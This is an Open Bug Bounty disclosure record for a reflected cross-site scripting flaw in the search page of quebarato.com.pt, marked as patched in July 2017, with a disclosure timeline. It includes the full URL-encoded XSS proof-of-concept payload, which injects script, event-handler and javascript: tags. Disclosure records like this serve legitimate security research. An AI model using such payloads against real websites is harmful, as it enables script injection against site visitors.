quebarato.com.pt XSS vulnerability

2016-12-16T13:42:00
ID OBB:198205
Type openbugbounty
Reporter AndresERiveraB
Modified 2017-07-28T13:18:00

Description

Vulnerable URL:
http://www.quebarato.com.pt/search?q=%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm(%27openbugbounty%27)%3E%3C%2Fmarquee%3E%22%3E%3C%2Fplaintext\%3E%3C%2F|+\%3E%3Cplaintext%2Fonmouseover%3Dprompt(%27openbugbounty%27)%3E%3Cscript%3Eprompt(1)%3C%2Fscript%3E%40gmail.com%3Cisindex+formaction%3Djavascript%3Aalert(%2FXSS%2F)+type%3Dsubmit%3E%27--%3E%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(1)+%3C%2Fscript%3E%22%3E
Details:

Description| Value
---|---
Patched:| Yes, on 28.07.2017
Latest check for patch:| 28.07.2017 13:18 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1399514
VIP website status:| No
SSL connection grade for quebarato.com.pt:| F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 December, 2016 13:42 GMT
Generic security notifications sent to website owner| 16 December, 2016 13:44 GMT
Notification sent to subscribers (without technical details)| 16 December, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 10 March, 2017 14:15 GMT
Vulnerability patched by the website owner| 28 July, 2017 13:18 GMT